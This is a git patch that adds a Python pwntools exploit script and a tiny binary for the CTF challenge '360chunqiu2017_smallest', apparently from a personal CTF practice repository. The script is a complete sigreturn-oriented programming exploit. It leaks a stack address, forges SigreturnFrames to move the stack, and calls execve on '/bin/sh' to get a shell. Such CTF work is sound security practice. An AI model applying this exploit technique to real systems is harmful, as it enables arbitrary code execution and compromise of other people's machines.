From 0c02788672de202c394f634ba7ed105906e71d80 Mon Sep 17 00:00:00 2001
From: Jack Ren <bjrjk@qq.com>
Date: Wed, 19 Jan 2022 23:36:01 +0800
Subject: [PATCH] Finished ROP/SROP/360chunqiu2017_smallest

---
 ROP/SROP/360chunqiu2017_smallest/exp.py   |  58 ++++++++++++++++++++++
 ROP/SROP/360chunqiu2017_smallest/smallest | Bin 0 -> 408 bytes
 2 files changed, 58 insertions(+)
 create mode 100755 ROP/SROP/360chunqiu2017_smallest/exp.py
 create mode 100755 ROP/SROP/360chunqiu2017_smallest/smallest

diff --git a/ROP/SROP/360chunqiu2017_smallest/exp.py b/ROP/SROP/360chunqiu2017_smallest/exp.py
new file mode 100755
index 0000000..b86547f
--- /dev/null
+++ b/ROP/SROP/360chunqiu2017_smallest/exp.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python2
+from pwn import *
+import time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process('./smallest')
+elf = ELF('./smallest')
+#gdb.attach(p, 'b *0x4000C0')
+time.sleep(1)
+
+CLEAR_EAX_READ_ADDR = 0x4000B0
+READ_ADDR = 0x4000B3
+SYSCALL_ADDR = 0x4000BE
+RET_ADDR = 0x4000C0
+
+payload = ""
+payload += p64(CLEAR_EAX_READ_ADDR) # Set Syscall ID(write, 1) to RAX: Input 15 Characters
+payload += p64(READ_ADDR) # write(stdout, rsp, 0x400)
+payload += p64(CLEAR_EAX_READ_ADDR) # Back to read()
+
+p.send(payload)
+raw_input()
+p.send('\xb3') # Low Byte of READ_ADDR
+p.recv(0x8)
+leak_stack = u64(p.recv(0x8)) & 0xffffffffffff0000
+bin_sh_addr = leak_stack + 0x300
+print("leak stack: ", hex(leak_stack))
+raw_input()
+
+payload = p64(CLEAR_EAX_READ_ADDR) # Set Syscall ID(rt_sigreturn, 15) to RAX: Input 15 Characters
+payload += p64(SYSCALL_ADDR) # Do rt_sigreturn() Syscall
+frame = SigreturnFrame()
+frame.rax = constants.SYS_read # do read
+frame.rdi = 0 # fd
+frame.rsi = leak_stack # buf
+frame.rdx = 0x500 # count
+frame.rip = SYSCALL_ADDR
+frame.rsp = leak_stack # migrate stack to leak_stack
+payload += bytes(frame)
+p.send(payload)
+raw_input()
+p.send(p64(SYSCALL_ADDR) + '\x00' * 7)
+raw_input()
+
+payload = p64(CLEAR_EAX_READ_ADDR) # Set Syscall ID(rt_sigreturn, 15) to RAX: Input 15 Characters
+payload += p64(SYSCALL_ADDR) # Do rt_sigreturn() Syscall
+frame = SigreturnFrame()
+frame.rax = constants.SYS_execve
+frame.rdi = bin_sh_addr
+frame.rip = SYSCALL_ADDR
+frame.rsp = leak_stack # migrate stack to leak_stack
+payload += bytes(frame)
+payload += (0x300-len(payload)) * 'A' + "/bin/sh\x00"
+p.send(payload)
+raw_input()
+p.send(p64(SYSCALL_ADDR) + '\x00' * 7)
+raw_input()
+p.interactive()
\ No newline at end of file
diff --git a/ROP/SROP/360chunqiu2017_smallest/smallest b/ROP/SROP/360chunqiu2017_smallest/smallest
new file mode 100755
index 0000000000000000000000000000000000000000..96b59a183eb1283913b623e7936951f05a29518b
GIT binary patch
literal 408
zcmb<-^>JfjWMqH=CI&kO5N`v616T+`GBDf#^B{x+g9QT<P@Wk`g4D7i$uU6n!RUif
zIT+2rpa2#Ld|HyihN2HYM*u4AVR&E{0}BI#N9Qw-&g1;7hZ*#WGm1-!N)nS8^h#1I
tO7I&)v@ADJCCG0uH^RbW1JndTG?QTNg9(H5GQ&7XG%Os@^@G$S0{}*L7XknP

literal 0
HcmV?d00001